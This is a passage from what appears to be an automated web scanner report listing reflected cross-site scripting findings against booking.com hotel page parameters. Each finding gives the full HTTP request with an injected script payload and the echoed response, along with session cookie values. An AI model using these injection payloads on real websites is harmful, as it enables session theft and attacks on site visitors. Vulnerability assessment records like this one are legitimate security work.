ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:14:39 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zIsOtbI9WtyhMLyE%2FQV%2FQTYiotzAvC9%2BdCHM75BMNs3mrrHPVgsIUgDIs4u8XFfeLk4jiI90swJSsvNlRDq7wypY5P37W7kmz6xzvrF3kMGzQwd24NucnZXKqFcgAzEPSENFO%2BPDG5e3BMZO5ke2Qkx24r8suLRNggmcfMQhCgb1FmPF25rNAeoc2nzWRqhOouVDQSICkIhuFjAr%2F1k8S0fbluUStTHfzqdnMW9lY3Di0NtlHwyjcpqETFzs8r1jWq3gXAXpc5o8f9%2F2DQiIb%2FG6ntjWcDl5yPrMm%2BebuEaiVGImDi9uZnok37OJnDV4yQqPG71fkXFLDvRl2OfyYKRZtc1cjbiMO93ggRFNYfSb7lX9oZNe72Qvj8tq6iA7CAFWCU6Xh2CwZvca5l7wY4W%2F2I4qgvr6ZgIhxzJ56QbsCoLtkLdGNqSmH%2FCSwYKdXDm9%2Bii6DBhkZLNjbCUW%2FW3blDTd33cuBDwKRU2rm9rpJA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:14:39 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 224367
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
oston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10ed23e"><script>alert(1)</script>defc7b1fdf7&checkout_monthday=16&checkout_year_month=2011-10&lang=en">
...[SNIP]...
4.173. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_year_month parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkin_year_month request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da324</script><script>alert(1)</script>03dbfbc3f4c was submitted in the checkin_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10da324</script><script>alert(1)</script>03dbfbc3f4c&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:15:04 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74m327rSMm5c9JJEUOw2zQiSbjMQslasKIWsdewz%2F0VtJrS%2FBe3j2XL%2BYh4BDPO%2BDitbsFTdP%2BluEtiJQBcWAWgr4XDHiM8uwMW3un%2FWwmI4CSVSlaOkrLTHf%2FllikL9mVsc383Po26ey%2Fc0%2B2Hkw%2FYW76yELDlnscWvB50nxviHv839E%2BczuCHQKEsCc4Bo1VxY9jrvJI4eQ1AolBx2RM%2FAkETjClhI4XLH1ujvZJSUMkApk4hRuNGECvfhIc%2FSnwJCAyKSCHaFVSyK6T%2FVYP6ZX3rJ091HiMcq%2B624eqW2MhvUdS8yL5sb7qv4UTWITTKja2khJa%2FwvpvMkvnxs3CmrHQks9BfTH3FwutnBd1A6SWGnxW5V0wy349j1cB99T50gsjTvHOal87WkL4YdOwpehjb%2BQQAREgddobDCvgsDHYtvUZO0hW%2FxVubY44OUOoCKizCh25iZekU9khZq0aFUklNtvejis7bmtDRg1CK2o8jVo8H2Wit3sw5d%2FxGfiTGEGYZLbxNX3zvPxsV4xG%2FKgqh%2B0YIErwU53qNZQiNTY503KCjrl5Y5GGBbXSfY%2FEB3ogs0fPDA%2B45IrqX4ZRADOx1R%2BVQ%2F312tqH6NxXUnHy4%2BuihLsXqd5NKDi8Z41%2Fpv511Xpuvw%2BC%2BD8LqLPuTE3qRwo7wR%2FdDKo1Ih3A73RKaq752Ej74mdW%2BLSus3H9iM2mqKwbclvtUfDah8p9CtFyxMF4AIF%2BUXhKk6LyHP0kzpubR2nlTmbX6YrKcEHJHyDjwwGQeBxvO5ZItRX98AMj5J3nXFe2F8dfet%2FI%2B2HjgQhi2GYdVJZcH1NZlNjOk1cUj0ZzU2VpsRQimVIvotszp39YgKN%2F4kej5tZtVCMWc%2B%2BvMrw6PkNzavwZBE8%2FlxOf2FigIZIRFdNfd6%2BmH3JOU3PIimbYn08%2BvenTsLBbBJ3CyXGV6WK9%2BEeepI0hOW4VPOMNaQi6KqDKgQ%2BW9W7AyLBtB7LnlPXUQOlDbjJJvdHokYoARDjkXnF5ObLMb93Ebr1vZQ2MGrLX%2FNAQavDW8ipi93nyz00RUHEQrPqHRo96IJO2FL8W3AG4cbCR6gLsKhG0sNrgph5mVcgTH0kN6JU5R40OuMqEReSTrsQH7s8zwsN7aPjCL%2BTOTulBufBxgfodUA5cVhNV%2Bwy2OqQ3uaKzQvjpzCZy1dCqQFKAgwOHDEtM3GOLk0r%2F%2FuxfMcXLrIstgyafuaOasGyHHPRJiMAdVaTHBxMJFGnw6qROLOCrmN9J3BUI9eYvA7wc%2F4FIw5Ra88BHq1adM6G26uj7Q5ZnMX3JF%2Bj5ymt3ugBre1bo0OOn0stFqwEwBzCp5nAlBO8GkGoibIjti4slEA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:15:05 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 224386
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
oston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10da324</script><script>alert(1)</script>03dbfbc3f4c&checkout_monthday=16&checkout_year_month=2011-10&lang=en',
b_this_url : '/hotel/us/c-boston-massachusettes.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin_monthda
...[SNIP]...
4.174. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_monthday parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkout_monthday request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18d6b</script><script>alert(1)</script>36cc332c433 was submitted in the checkout_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=1618d6b</script><script>alert(1)</script>36cc332c433&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:15:34 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN4sTMjg6DJx7HaHS0Wu0DonGruQ19C5%2FA2qwp1uvnNC5LVmEZc%2FtD1X1w4xTGvBb2G71SGaRMBvID57Yanw9uScUOt940TVeeaUgqpS1YShC4kjKNg57XijsKAC2j2mwWCKDGStgBC6sTjB3%2FWgfEM87EKWcRIJyqg0GEKabkj9CEJEyWm04nb9QB%2BQ84LCo7LgTfGOHW7BiixkUqVZAydOmJ1X8u4P5PXNBllvMUdAPeuPsD%2B8lnVUNG3trDLVacg0NzPDp27DiAsrAttvm6a%2BVrBtOS6LZZ%2F5jRj%2BdtGwRN1k9R8PWj%2Fm47Mz3uilEy1jl4sZvvApowYkUymolIit0e8S6zt8yNjVHZql7jwEJN%2FJOXf3HaA7Y71wtiPNPFlVAu%2Bm55r4A%2FxyfLargsHl%2BsHVpzGdL1osyPN7t7enDzwE7hs2PvqTyD72vu2ah2tgYhoZQ0ZQVumaIHfeyUB%2Fp2hjdMRBtoDvfoei%2BuJzbvGsgYsGU0pVIp0Ofg5WXmVDub3Zc3tMFq4nEx8y3OepEoByBFm3CJAB7HTbSOEfSGS2AlYi3OPjpwU1iNblWEnUrMvHO%2BiOi2rqvgNHKQWixtu4LttcQnPtSr84YM3Wnn9kxiJLAW6g%2B3RtALfxU4%2BB2Bou%2FvyeMTDC%2Bggu%2FfI%2FhsBlsiQ40BEkdZkUAOA8eEbGBtTeKW2vx2PXG%2BCYrM3mQdB4gctyHXkS8WnJ%2F%2BaRmm7Sx3ytJ%2FzAafSldVeHoXDlneYtnEXkmQE32nYXgvhkRShU3Z97KIlGwpmjnkSFrawo2DWkRnhtZHzv%2FlHJ7nx4iNBLh0Uc8EJnpC3vINgBoBpFdiYOXh8HWtd%2BN2H9KK1Rb4dgioB0WAOOAj13oKSwaVgSzLZAeNg0584mKDvvOKCp7HpfjRBo0IyHEkQCqf9WwHZWwpHrZEhChd%2FbdruG1xEHomQ4WJbmVunk3B0joGNRrj7n%2BtwKivSLr0cPVRSK02E0uVtTsydSE9VK0UqmXLKjGCCnaPUKFJxDN1xHfEEtc7w6ss%2FY9lGr0ePJMwRHAJ77zFIZvSoZMPFaOoEvfieKqdt1jbyHCVB0n4cxO5jx49%2FvdPR6ISHIUXzUcrjFFM%2FmBnZiXcvvFLU8C3b8ECppcVj6iK4Tg20h4Nm7egjUCTXfUYdaUii97GWjoZlCQAD3n7VqfbCc6%2F%2FkRYNBtiSSPXotMFaiLTFF0a3BnLah0LSDawoZ6stNl6gbnwH0khoP94q%2Fllaar6%2FQBKXuAEjKt%2FbzRTPCWCfUPk5fDyApMRhMS%2BxCTEaiPctKlUT1FfHxV1XmmKt1loHtws%2By0Ia32RDhAYyhw0J4QG7OBjqKTrVfPCxS%2FSjiPB3eA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:15:35 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 230242
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=1618d6b</script><script>alert(1)</script>36cc332c433&checkout_year_month=2011-10&lang=en',
b_this_url : '/hotel/us/c-boston-massachusettes.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin_monthday=14;checkin_year_mon
...[SNIP]...
4.175. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_monthday parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkout_monthday request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 175d4"><script>alert(1)</script>4d50fc21cb9 was submitted in the checkout_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16175d4"><script>alert(1)</script>4d50fc21cb9&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:15:08 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGbFMKGxhLGxcV8JgVcsNPdwFrYE9stqnMmO6fnezme%2FSKovCgD%2FmghVroj8%2Fv94KVF6nxVdJXxbxsoyyUKiMxk%2BHqWhhgecDSoZbfT3IgB%2Bys5JhVUx09wv%2FCvqgNFA3NTgOGzPpI21kul0Km944LAkGjdCk98wlfQJBQIMubVfwwTOiRjuhNTdmO3Arzv5TP%2B554VEudje40Z8cfyqZ06Lc4QvCHW5ttNGQ%2BIad7noRujQlQVCKhyWKOE6Eo1n3N6aR6certxqGl38fEJzkQPbYn1qGOItUUm%2FOYEMIq%2FyMr4VDvz%2Be4RfapT9%2Bez%2BNVYQ%2Bdlv87DkdXvN%2BbnMOdMzpEXWhAH9qNjlZ71rvXXvJrfbGJg8Kro8dJq9Bx22pxeX5puEOANM7mDjSVTGQfv6cZg2iJpy66pGhA4c1tnsFtS1oVGn3Z%2BFIBA01R3VhaI60xAxg587Tf%2BBN0Nb832D9CwPqiPsrDAjr01J8Lhew%2FvLEiX9GCG9tszA3SXlesk3QQeA6gN2xThCdpUEcKKpn9wBASP6irw%2Bm0CcMtCp%2BZK%2FdgOEG%2Bq1vrdS2h2GMq9rTCdVsS6VpM8frDZq6fwhbw68G6LavMuIKDc6STqUtTh91C6oovmRh%2Fvgz6VpegApFBpvWwg7hyJohSQPigg1eoBT9awgqDlxbXiOf3pO9FGTVbsXbOp9fHXdgqbXpiu6rkEYMvK4%2FH5EpYBbC9NQjADPtg84ePxV5JFOlABqQbM37dsyNq5Xeif5YUQEOJplrOfb4QMvNShvWBMqrymM0f42gK4RHlnEXNz8n4dCp2yPQJuqtJ9nj36s2hlfkqQ2127YunPFfVi3HMuHp3FRc3%2BNrwCZY%2BuDZbufxU7RD7gBS9a6FhqrVGvSLK%2FpNMVkn5HJihS95nPo4XyathQybCEF0ebdjYN9FqqlTKvWHKNAIKLI10xOsbQYUIog6xuU6PChY3BqteIeVz1OLoCOWWy%2BcDRGw4u%2B6sV0EueG%2BZLO2CFc6Ez9emFaPDVlwv2cBRCKKzVIidd4G%2Fylg1EqJgEK73%2FlsSPlC35oKU4CWu5R80J4A7%2Fiw4t3xyJNfZMXHtxMeS3ICAsVChm%2BfU772CyNOmoD7GfITPvToYBlsV0fKobNFmVl68%2BomffDjEwVkPT2HYfjps%2BdMVovvVSejuqx%2FRjGuOlLB8GUwJ9rkU8CkgHGs06k%2FBFC8taHgkCkMOxmTo2pFi7QDIO9vk2AWX7JKRHRprGkW4FBeefwabpcwyipO56OMDVkYSE5OU9sSWiPXVcymY9QdMqQcMoJZ36nzJLDJgN8JH%2B5F4gje9nW8HeBz4chBAT9LuI9q45%2F5rvHx8FLo1J6zPo0y8%2Fw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:15:09 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 230222
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
